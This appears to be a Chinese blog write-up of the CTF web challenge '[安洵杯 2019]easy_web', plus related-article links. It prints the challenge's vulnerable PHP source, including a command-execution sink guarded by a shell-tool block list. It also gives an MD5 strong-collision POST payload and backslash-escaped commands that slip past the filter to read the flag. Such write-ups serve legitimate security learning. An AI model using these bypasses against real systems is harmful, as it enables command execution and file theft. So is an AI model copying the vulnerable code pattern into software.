[安洵杯 2019]easy_web(MD5强碰撞绕过)

已于 2022-04-10 20:19:06 修改
阅读量1.5k 收藏 7
点赞数 1
分类专栏: Web刷题记录 文章标签: php
于 2020-11-06 15:09:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109527378
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
[安洵杯 2019]easy_web
在这里插入图片描述

点进去就看到这个url,cmd传入ls、dir没什么用
img这边把他删了,图片就没了
在这里插入图片描述
那这里应该可以利用来读文件了,但是他加密过了,看起来像base64,解下密
在这里插入图片描述
看起来也像base64,再来一次
在这里插入图片描述
这次就解出个像hex编码的字符串了,解密后得出文件名

555.png

那我们知道这的确是文件名经过加密后传入到img里面,那我们可以试试读index.php看看源码
先加密一波,可以得到这个字符串

TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

传入到img里面,查看源代码
在这里插入图片描述
复制后base64解出来就是源码了:

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

审计总结:

1.可以看到img传入后设置变量为file,给正则/[^a-zA-Z0-9.]+//flag/i过滤了,读不了flag文件
2.echo `$cmd` \\这个`字符包围的是会执行系统命令的
3.对$cmd也做出了正则匹配的限制,许多命令不能直接使用
4.还需要POST传入变量a、b进行md5强碰撞绕过才能使用cmd

看过源码后那就好办了
这个是POST需要提交的强碰撞payload:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

有兴趣了解MD5强碰撞绕过的同道可以去看我写过的文章:
https://editor.csdn.net/md/?articleId=109525162

先看看/目录下有什么东西,用dir%20/
在这里插入图片描述
看到有flag,用cat%20/flag肯定会给正则匹配,linux是可以加\在命令中的,我们可以用ca\t%20/fl\ag来绕过
在这里插入图片描述
还有个命令可以读flag
sort命令:sort将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。
在这里插入图片描述

小 白 萝 卜
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MD5.zip_MD5Java_easy _elephantykb
09-21
标题中的"MD5.zip_MD5Java_easy_elephantykb"表明这是一个关于Java实现MD5加密的压缩包,易于使用,由用户"elephantykb"分享。这个压缩包可能包含了实现MD5加密功能的相关代码和文档。 描述中提到"JAVAMD5加密 很...
ctf 绕过php,第三届NSCTF测试题Code phpMD5碰撞php strcmp函数绕过
weixin_36402765的博客
03-19 295
第三届NSCTF测试题Code phpMD5碰撞php strcmp函数绕过1、打开网页如图,F12发现code.txt:2、需要php代码审计,提示需要get方式提交3个参数(v1、v2、v3)且v1和v2的值不同,但md5后的值相同(中间是&&与符号),为真时再利用strcmp函数判断v3和$flag是否相同,为真输出flag;3、在问了几个朋友后,得到一些提示,首先MD...
md5比较的几种绕过碰撞,shal比较的几种绕过碰撞
m0_73818134的博客
07-18 3891
md5比较的几种绕过碰撞,shal比较的几种绕过碰撞
MD5绕过弱类型比较)_md5比较绕过
最新发布
2401_84302369的博客
05-17 482
没有总结,凑合看吧。
[安洵 2019]easy_web详解
weixin_61995249的博客
10-03 705
靶场:https://www.nssctf.cn/problem/732。
[base]MD5碰撞
weixin_74911687的博客
03-02 550
md5
buuctf-[安洵 2019]easy_web(小宇特详解)
小宇的web博客
02-16 3099
buuctf-[安洵 2019]easy_web(小宇特详解) 这里查看题目 这里在url里发现了img传参还有cmd 这里先从img传参入手,这里我发现img传参好像是base64的样子 进行解码,解码之后还像是base64的样子再次进行解码 3535352e706e67 这个数好像是16进制的,进行16进制转换成字符串 555.png 这里利用这个原理,先将index.php16进制编码,然后进行两次base64编码 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 base64解
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
MSC.EASY5.zip_Easy5_msc easy5_vehicle vibration
09-19
【标题】"MSC.EASY5.zip" 是一个包含有关Easy5软件的压缩文件,主要针对“Easy5_msc easy5_vehicle vibration”主题,这显然与车辆振动分析和Easy5软件的应用有关。Easy5是一款大的多体动力学仿真工具,特别用于...
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
[安洵 2019]easy_web
人若无名,便可专心练剑
03-11 1574
但是我们发现这个url有传参,而且在url中,发现img这个位置存在一串字符串,看着像是base64编码的,我就尝试着base64解码,发现这个字符串是利用两次base64编码然后再利用一次hex编码,经过解码得到555.png,那么我们到这里就可以想着,要是可以拿到index.php的源代码,那么我们再进行代码审计,查看下有什么线索没有。我们利用burp抓包,然后再按一次先hex编码,然后再两次base64编码,然后修改img的值,然后利用img读取index.php的源代码。
ctf中md5及sha1碰撞绕过(字符串string型)
热门推荐
NLost
03-30 1万+
md5碰撞 if(md5($a1) === md5($a2)){echo "you find it!"; }
[安洵 2019]easy_serialize_php 1
03-16
s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值